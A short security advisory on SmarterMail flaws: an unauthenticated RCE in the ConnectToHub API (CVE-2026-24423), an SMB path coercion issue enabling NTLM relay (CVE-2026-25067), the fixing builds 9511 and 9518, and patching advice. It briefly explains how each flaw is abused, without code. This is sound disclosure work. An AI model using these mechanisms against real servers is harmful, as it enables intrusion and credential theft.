SmarterMail email software received fixes after a CVE record on CVE.org states an unauthenticated remote code execution vulnerability tracked as CVE-2026-24423 carries a CVSS score of 9.3 and could allow arbitrary code execution. Build 9511 dated January 15, 2026 addresses the issue.
KEY FACTS
- Vulnerability CVE-2026-24423 unauthenticated RCE in ConnectToHub API, CVSS 9.3
- Patches Build 9511 dated January 15, 2026 and Build 9518 dated January 22, 2026
- Additional flaw CVE-2026-25067 path coercion, CVSS 6.9 can enable NTLM relay
- Active exploitation a related critical bypass was reported as being exploited in the wild
The ConnectToHub API flaw allows an unauthenticated attacker to point the application at a malicious HTTP host that serves an operating system command which the application can execute. The behavior enables remote code execution without prior authentication.
Build 9511, dated January 15, 2026, contains the patch for CVE-2026-24423 and the build also addresses another critical authentication bypass tracked as CVE-2026-23760. Details of fixes and version notes appear in the SmarterTools release notes.
A separate medium severity issue, CVE-2026-25067, involves unauthenticated path coercion of a background-of-the-day preview endpoint. The application base64-decodes attacker-supplied input and uses it as a filesystem path without validation, which can cause Windows systems to resolve UNC paths and trigger outbound SMB authentication attempts.
The outbound SMB authentication behavior can be abused for credential coercion, NTLM relay attacks and unauthorized network authentication. The extent of in-the-wild exploitation for CVE-2026-24423 was not specified in the available record.
WHY IT MATTERS
An unauthenticated remote code execution flaw can allow full compromise of affected servers and a path coercion issue that forces outbound authentication can be used to capture or relay credentials. Administrators should apply the listed builds promptly to reduce risk.